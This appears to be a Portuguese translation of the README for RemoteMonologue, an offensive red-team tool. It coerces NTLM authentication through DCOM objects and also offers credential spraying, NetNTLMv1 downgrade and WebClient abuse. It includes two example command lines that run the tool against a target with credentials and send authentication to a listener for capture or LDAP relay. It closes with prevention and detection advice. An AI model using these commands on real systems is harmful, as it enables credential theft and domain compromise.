
Armando DCOM para Coerções de Autenticação NTLM
RemoteMonologue é uma técnica de captura de credenciais do Windows que permite o comprometimento remoto de usuários ao explorar a chave RunAs do Interactive User e forçar autenticações NTLM via DCOM.
Leia o RemoteMonologue: Usando DCOM como Arma para Coerções de Autenticação NTLM da X-Force Red para obter informações detalhadas.
🔹 Coerção de Autenticação via DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) para disparar uma autenticação NTLM contra um listener especificado (-auth-to).🔹 Spray de Credenciais (-spray)
🔹 Ataque de Rebaixamento NetNTLMv1 (-downgrade)
🔹 Abuso do Serviço WebClient (-webclient)
🔹 Enumeração de Usuários (-query)
Nota: É necessário ter privilégios de administrador local no sistema de destino.
pip install impacket
Abaixo está um exemplo de execução do RemoteMonologue com o ataque de rebaixamento NetNTLMv1 enquanto usa o Responder como listener. Por padrão, se nenhuma opção DCOM for especificada, a ferramenta usa o objeto DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Abaixo está outro exemplo, desta vez o ataque é executado usando o objeto DCOM FileSystemImage e habilitando o serviço WebClient para obter uma autenticação HTTP, que então é retransmitida para LDAP usando ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Para se proteger e detectar essas técnicas, existem várias medidas preventivas e de detecção que podem ser implementadas.
Medidas preventivas:
Habilite a Assinatura LDAP e a Vinculação de Canal: Configure a aplicação da assinatura LDAP e a vinculação de canal em controladores de domínio para proteger o endpoint LDAP contra ataques de relay. Nota: Essas configurações serão aplicadas por padrão a partir do Windows Server 2025.
Atualize para as Versões mais Recentes do Windows: Atualize servidores para o Windows Server 2025 e estações de trabalho para o Windows 11 versão 24H2 para mitigar ataques de rebaixamento NetNTLM, pois o NTLMv1 foi removido nessas versões.
Imponha a Assinatura SMB: Habilite e imponha a assinatura SMB em servidores Windows para evitar ataques de relay SMB.
Implemente Políticas de Senha Fortes: Imponha requisitos de senhas fortes para tornar os ataques de quebra de senhas mais difíceis.
Oportunidades de detecção:
Monitore o Acesso Remoto aos Objetos DCOM: Rastreie o acesso aos objetos DCOM afetados e às suas Propriedades e Métodos específicos para identificar atividades incomuns.
Monitore Modificações no Registro: Monitore alterações nas chaves de registro RunAs e LmCompatibilityLevel.
Rastreie a Atividade do Serviço WebClient: Monitore casos em que o serviço WebClient é habilitado remotamente, pois isso é usado para facilitar autenticações NTLM baseadas em HTTP.